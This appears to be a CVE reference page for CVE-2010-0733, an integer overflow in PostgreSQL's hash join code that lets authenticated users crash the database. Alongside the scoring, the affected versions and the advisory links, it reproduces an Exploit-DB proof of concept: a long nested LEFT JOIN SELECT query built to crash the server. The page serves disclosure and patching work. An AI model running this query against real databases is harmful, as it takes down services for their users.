CVE-2010-0733 : Detail

CVE-2010-0733

5.06%V3
Network
2010-03-19
18h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer overflow in src/backend/executor/nodeHash.c in PostgreSQL 8.4.1 and earlier, and 8.5 through 8.5alpha2, allows remote authenticated users to cause a denial of service (daemon crash) via a SELECT statement with many LEFT JOIN clauses, related to certain hashtable size calculations.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.5 AV:N/AC:M/Au:S/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 33729

Publication date : 2014-06-12 22h00 +00:00
Author : Bernt Marius Johnsen
EDB Verified : Yes

source: https://www.securityfocus.com/bid/38619/info PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations. An attacker can exploit this issue to cause the affected application to crash. Due to the nature of this issue, remote code execution may be possible; this has not been confirmed. SELECT * from B AS alias0 LEFT JOIN BB AS alias1 LEFT JOIN B AS alias2 LEFT JOIN A AS alias3 LEFT JOIN AA AS alias4 LEFT JOIN B AS alias5 ON alias4.int_key = alias5.int_key ON alias3.int_key = alias4.int_key LEFT JOIN AA AS alias6 LEFT JOIN A AS alias7 ON alias6.int_key = alias7.int_key LEFT JOIN BB AS alias8 ON alias7.int_key = alias8.int_key ON alias3.int_key = alias8.int_key LEFT JOIN AA AS alias9 ON alias6.int_key = alias9.int_key ON alias2.int_key = alias8.int_key LEFT JOIN BB AS alias10 LEFT JOIN AA AS alias11 LEFT JOIN B AS alias12 ON alias11.int_key = alias12.int_key ON alias10.int_key = alias11.int_key ON alias9.int_key = alias10.int_key ON alias1.int_key = alias8.int_key LEFT JOIN BB AS alias13 LEFT JOIN A AS alias14 LEFT JOIN AA AS alias15 LEFT JOIN A AS alias16 ON alias15.int_key = alias16.int_key LEFT JOIN B AS alias17 ON alias15.int_key = alias17.int_key ON alias14.int_key = alias16.int_key LEFT JOIN AA AS alias18 ON alias14.int_key = alias18.int_key LEFT JOIN B AS alias19 ON alias15.int_key = alias19.int_key LEFT JOIN AA AS alias20 ON alias16.int_key = alias20.int_key ON alias13.int_key = alias19.int_key LEFT JOIN A AS alias21 ON alias13.int_key = alias21.int_key ON alias3.int_key = alias17.int_key LEFT JOIN B AS alias22 ON alias7.int_key = alias22.int_key LEFT JOIN A AS alias23 ON alias20.int_key = alias23.int_key LEFT JOIN A AS alias24 ON alias14.int_key = alias24.int_key LEFT JOIN BB AS alias25 LEFT JOIN BB AS alias26 ON alias25.int_key = alias26.int_key LEFT JOIN A AS alias27 LEFT JOIN A AS alias28 ON alias27.int_key = alias28.int_key LEFT JOIN B AS alias29 LEFT JOIN BB AS alias30 LEFT JOIN B AS alias31 LEFT JOIN A AS alias32 LEFT JOIN B AS alias33 ON alias32.int_key = alias33.int_key LEFT JOIN A AS alias34 ON alias32.int_key = alias34.int_key ON alias31.int_key = alias33.int_key ON alias30.int_key = alias33.int_key ON alias29.int_key = alias34.int_key ON alias27.int_key = alias34.int_key LEFT JOIN AA AS alias35 LEFT JOIN A AS alias36 ON alias35.int_key = alias36.int_key ON alias34.int_key = alias36.int_key LEFT JOIN A AS alias37 ON alias33.int_key = alias37.int_key ON alias25.int_key = alias32.int_key LEFT JOIN A AS alias38 ON alias37.int_key = alias38.int_key ON alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key

Products Mentioned

Configuraton 0

Postgresql>>Postgresql >> Version To (including) 8.4.1

Postgresql>>Postgresql >> Version 8.0

Postgresql>>Postgresql >> Version 8.0.0

Postgresql>>Postgresql >> Version 8.0.1

Postgresql>>Postgresql >> Version 8.0.2

Postgresql>>Postgresql >> Version 8.0.3

Postgresql>>Postgresql >> Version 8.0.4

Postgresql>>Postgresql >> Version 8.0.5

Postgresql>>Postgresql >> Version 8.0.6

Postgresql>>Postgresql >> Version 8.0.7

Postgresql>>Postgresql >> Version 8.0.8

Postgresql>>Postgresql >> Version 8.0.9

Postgresql>>Postgresql >> Version 8.0.10

Postgresql>>Postgresql >> Version 8.0.11

Postgresql>>Postgresql >> Version 8.0.12

Postgresql>>Postgresql >> Version 8.0.13

Postgresql>>Postgresql >> Version 8.0.14

Postgresql>>Postgresql >> Version 8.0.15

Postgresql>>Postgresql >> Version 8.0.16

Postgresql>>Postgresql >> Version 8.0.17

Postgresql>>Postgresql >> Version 8.0.18

Postgresql>>Postgresql >> Version 8.0.19

Postgresql>>Postgresql >> Version 8.0.20

Postgresql>>Postgresql >> Version 8.0.21

Postgresql>>Postgresql >> Version 8.0.22

Postgresql>>Postgresql >> Version 8.0.23

Postgresql>>Postgresql >> Version 8.0.24

Postgresql>>Postgresql >> Version 8.0.317

    Postgresql>>Postgresql >> Version 8.1

    Postgresql>>Postgresql >> Version 8.1.0

    Postgresql>>Postgresql >> Version 8.1.1

    Postgresql>>Postgresql >> Version 8.1.2

    Postgresql>>Postgresql >> Version 8.1.3

    Postgresql>>Postgresql >> Version 8.1.4

    Postgresql>>Postgresql >> Version 8.1.5

    Postgresql>>Postgresql >> Version 8.1.6

    Postgresql>>Postgresql >> Version 8.1.7

    Postgresql>>Postgresql >> Version 8.1.8

    Postgresql>>Postgresql >> Version 8.1.9

    Postgresql>>Postgresql >> Version 8.1.10

    Postgresql>>Postgresql >> Version 8.1.11

    Postgresql>>Postgresql >> Version 8.1.12

    Postgresql>>Postgresql >> Version 8.1.13

    Postgresql>>Postgresql >> Version 8.1.14

    Postgresql>>Postgresql >> Version 8.1.15

    Postgresql>>Postgresql >> Version 8.1.16

    Postgresql>>Postgresql >> Version 8.1.17

    Postgresql>>Postgresql >> Version 8.1.18

    Postgresql>>Postgresql >> Version 8.1.19

    Postgresql>>Postgresql >> Version 8.1.20

    Postgresql>>Postgresql >> Version 8.2

    Postgresql>>Postgresql >> Version 8.2.1

    Postgresql>>Postgresql >> Version 8.2.2

    Postgresql>>Postgresql >> Version 8.2.3

    Postgresql>>Postgresql >> Version 8.2.4

    Postgresql>>Postgresql >> Version 8.2.5

    Postgresql>>Postgresql >> Version 8.2.6

    Postgresql>>Postgresql >> Version 8.2.7

    Postgresql>>Postgresql >> Version 8.2.8

    Postgresql>>Postgresql >> Version 8.2.9

    Postgresql>>Postgresql >> Version 8.2.10

    Postgresql>>Postgresql >> Version 8.2.11

    Postgresql>>Postgresql >> Version 8.2.12

    Postgresql>>Postgresql >> Version 8.2.13

    Postgresql>>Postgresql >> Version 8.2.14

    Postgresql>>Postgresql >> Version 8.2.15

    Postgresql>>Postgresql >> Version 8.2.16

    Postgresql>>Postgresql >> Version 8.3

    Postgresql>>Postgresql >> Version 8.3.1

    Postgresql>>Postgresql >> Version 8.3.2

    Postgresql>>Postgresql >> Version 8.3.3

    Postgresql>>Postgresql >> Version 8.3.4

    Postgresql>>Postgresql >> Version 8.3.5

    Postgresql>>Postgresql >> Version 8.3.6

    Postgresql>>Postgresql >> Version 8.3.7

    Postgresql>>Postgresql >> Version 8.3.8

    Postgresql>>Postgresql >> Version 8.3.9

    Postgresql>>Postgresql >> Version 8.3.10

    Postgresql>>Postgresql >> Version 8.4

    Postgresql>>Postgresql >> Version 8.5

      Postgresql>>Postgresql >> Version 8.5

        Postgresql>>Postgresql >> Version 8.5

          References

          http://www.redhat.com/support/errata/RHSA-2010-0427.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://www.redhat.com/support/errata/RHSA-2010-0428.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://secunia.com/advisories/39820
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/bid/38619
          Tags : vdb-entry, x_refsource_BID
          http://www.openwall.com/lists/oss-security/2010/03/16/10
          Tags : mailing-list, x_refsource_MLIST
          http://www.openwall.com/lists/oss-security/2010/03/09/2
          Tags : mailing-list, x_refsource_MLIST
          http://www.redhat.com/support/errata/RHSA-2010-0429.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://www.vupen.com/english/advisories/2010/1197
          Tags : vdb-entry, x_refsource_VUPEN